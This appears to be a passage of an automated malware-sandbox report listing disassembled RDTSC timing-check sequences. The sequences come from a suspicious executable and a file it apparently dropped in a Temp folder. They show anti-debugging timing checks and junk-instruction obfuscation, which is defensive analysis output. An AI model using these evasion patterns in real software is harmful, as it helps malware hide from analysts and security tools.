                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390058 second address: 5390098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FF30CF3CAEDh 0x00000015 xor ax, B956h 0x0000001a jmp 00007FF30CF3CAF1h 0x0000001f popfd 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390098 second address: 539009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539009C second address: 53900AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, 08h 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, C2h 0x0000000f push edx 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53900AE second address: 53900B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53900B3 second address: 53900DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF30CF3CAF1h 0x0000000e sub esp, 2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF30CF3CAEDh 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53901BD second address: 53901C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53901C3 second address: 5390203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FF30CF3CAF1h 0x00000010 sub edi, edi 0x00000012 pushad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 mov cx, bx 0x0000001c popad 0x0000001d inc ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ch, 6Eh 0x00000023 mov si, bx 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390203 second address: 5390209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390209 second address: 539020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539020D second address: 5390211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902C6 second address: 53902CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902CC second address: 53902D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53902D0 second address: 539030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FF30CF3CAF4h 0x0000000f mov bx, cx 0x00000012 pop ecx 0x00000013 mov ch, dl 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF30CF3CAF0h 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539030A second address: 5390319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390319 second address: 539031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539031F second address: 5390323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390323 second address: 5390327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539033B second address: 539033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539033F second address: 5390357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390357 second address: 539035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539035D second address: 53903B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF30CF3CAF9h 0x0000000f jg 00007FF37DC4ABF2h 0x00000015 jmp 00007FF30CF3CAEEh 0x0000001a js 00007FF30CF3CB64h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF30CF3CAF7h 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903B3 second address: 53903B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903B9 second address: 53903BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903BD second address: 53903C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903C1 second address: 53903F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF30CF3CAEDh 0x00000012 adc ecx, 4C55E246h 0x00000018 jmp 00007FF30CF3CAF1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov edx, esi 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53903F7 second address: 5390447 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FF37DEA2E53h 0x0000000d jmp 00007FF30D194DC4h 0x00000012 mov ebx, dword ptr [ebp+08h] 0x00000015 jmp 00007FF30D194DC0h 0x0000001a lea eax, dword ptr [ebp-2Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF30D194DC7h 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390447 second address: 53904AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 39A4129Ah 0x00000008 mov di, BE66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF30CF3CAEFh 0x00000019 or cx, 28EEh 0x0000001e jmp 00007FF30CF3CAF9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF30CF3CAF0h 0x0000002a sub eax, 7F99F068h 0x00000030 jmp 00007FF30CF3CAEBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904AD second address: 53904B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904B3 second address: 53904B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53904B7 second address: 5390518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FF30D194DC7h 0x00000010 nop 0x00000011 pushad 0x00000012 mov dx, ax 0x00000015 pushfd 0x00000016 jmp 00007FF30D194DC0h 0x0000001b or cx, 4528h 0x00000020 jmp 00007FF30D194DBBh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF30D194DC4h 0x0000002f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390518 second address: 5390556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF30CF3CAF6h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov al, 43h 0x00000013 mov ebx, 3FD2C47Eh 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF30CF3CAEBh 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390619 second address: 5380BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007FF37DEA2DECh 0x0000000c xor eax, eax 0x0000000e jmp 00007FF30D16E4EAh 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0004h 0x0000001a nop 0x0000001b sub esp, 04h 0x0000001e mov esi, eax 0x00000020 cmp esi, 00000000h 0x00000023 setne al 0x00000026 xor ebx, ebx 0x00000028 test al, 01h 0x0000002a jne 00007FF30D194DB7h 0x0000002c jmp 00007FF30D194EE1h 0x00000031 call 00007FF31163AB43h 0x00000036 mov edi, edi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF30D194DC3h 0x0000003f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BAD second address: 5380BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BD0 second address: 5380BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380BD4 second address: 5380C05 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF30CF3CAF8h 0x00000008 and eax, 6E352F08h 0x0000000e jmp 00007FF30CF3CAEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D4B second address: 5380D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D51 second address: 5380D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D55 second address: 5380D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D59 second address: 5380D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D68 second address: 5380D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D6E second address: 5380D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5380D74 second address: 539094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 add esp, 28h 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b mov eax, dword ptr [00EEBBB8h+ebx*4] 0x00000022 mov ecx, 15B4E13Fh 0x00000027 xor ecx, dword ptr [00EEBBC0h] 0x0000002d add eax, ecx 0x0000002f inc eax 0x00000030 jmp eax 0x00000032 push edi 0x00000033 call 00007FF30D1BE704h 0x00000038 push ebp 0x00000039 push ebx 0x0000003a push edi 0x0000003b push esi 0x0000003c sub esp, 0000017Ch 0x00000042 mov dword ptr [esp+00000160h], 00EEDD20h 0x0000004d mov dword ptr [esp+0000015Ch], 000000D0h 0x00000058 mov dword ptr [esp], 00000000h 0x0000005f mov eax, dword ptr [00EE9D4Ch] 0x00000064 call eax 0x00000066 mov edi, edi 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FF30D194DBBh 0x0000006f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 539094E second address: 53909A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FF30CF3CAF9h 0x00000015 and ah, FFFFFF86h 0x00000018 jmp 00007FF30CF3CAF1h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909A1 second address: 53909B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov di, 0D0Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909B5 second address: 53909B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909B9 second address: 53909BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909BD second address: 53909C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909C3 second address: 53909E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909E6 second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53909EC second address: 5390A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF30D194DBDh 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FF30D194DC1h 0x0000001a sub ecx, 52CF7C06h 0x00000020 jmp 00007FF30D194DC1h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390A42 second address: 5390A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390A48 second address: 5390AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [760F459Ch], 05h 0x00000012 jmp 00007FF30D194DC6h 0x00000017 je 00007FF37DE92D37h 0x0000001d jmp 00007FF30D194DC0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edi, 0DE4C650h 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390B68 second address: 5390B89 instructions: 0x00000000 rdtsc 0x00000002 mov di, A02Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF30CF3CAF1h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390B89 second address: 5390BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DBDh 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0A9A second address: 53A0AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov dl, ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, B8D4h 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FF30CF3CAF3h 0x00000019 pop esi 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AC2 second address: 53A0AE2 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 jmp 00007FF30D194DC0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AE2 second address: 53A0AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AE8 second address: 53A0B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dl 0x0000000f mov si, 7D73h 0x00000013 popad 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0B06 second address: 53A0BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FF30CF3CAF0h 0x0000000c xor si, 1478h 0x00000011 jmp 00007FF30CF3CAEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e mov al, F7h 0x00000020 mov eax, edi 0x00000022 popad 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF30CF3CAF9h 0x0000002c and ah, FFFFFFC6h 0x0000002f jmp 00007FF30CF3CAF1h 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF30CF3CAF0h 0x0000003b adc ax, 2068h 0x00000040 jmp 00007FF30CF3CAEBh 0x00000045 popfd 0x00000046 popad 0x00000047 je 00007FF37DC2A30Eh 0x0000004d jmp 00007FF30CF3CAF6h 0x00000052 cmp dword ptr [760F459Ch], 05h 0x00000059 pushad 0x0000005a jmp 00007FF30CF3CAEEh 0x0000005f push esi 0x00000060 mov bx, A1A4h 0x00000064 pop edi 0x00000065 popad 0x00000066 je 00007FF37DC423B5h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f mov edi, 46D77528h 0x00000074 call 00007FF30CF3CAF1h 0x00000079 pop esi 0x0000007a popad 0x0000007b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BE9 second address: 53A0BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBDh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BFA second address: 53A0BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BFE second address: 53A0C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C0F second address: 53A0C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C14 second address: 53A0C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBAh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C50 second address: 53A0C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C54 second address: 53A0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C93 second address: 53A0CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30CF3CAEBh 0x00000008 mov ax, 0B7Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF30CF3CAECh 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0CB9 second address: 53A0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0CC8 second address: 53A0CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, A8h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DFFDE second address: 8DF7E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF30D194DCBh 0x00000008 jmp 00007FF30D194DC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FF30D194DBBh 0x00000015 nop 0x00000016 js 00007FF30D194DB7h 0x0000001c stc 0x0000001d push dword ptr [ebp+122D1229h] 0x00000023 xor dword ptr [ebp+122D1B72h], eax 0x00000029 call dword ptr [ebp+122D195Dh] 0x0000002f pushad 0x00000030 cld 0x00000031 xor eax, eax 0x00000033 jmp 00007FF30D194DC1h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c cld 0x0000003d jg 00007FF30D194DCCh 0x00000043 jmp 00007FF30D194DC6h 0x00000048 mov dword ptr [ebp+122D36A1h], eax 0x0000004e clc 0x0000004f jmp 00007FF30D194DBAh 0x00000054 mov esi, 0000003Ch 0x00000059 add dword ptr [ebp+122D2703h], esi 0x0000005f pushad 0x00000060 mov bx, B6F0h 0x00000064 adc ah, 00000039h 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2703h], esi 0x00000072 lodsw 0x00000074 jmp 00007FF30D194DC5h 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d cld 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DF7E1 second address: 8DF7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
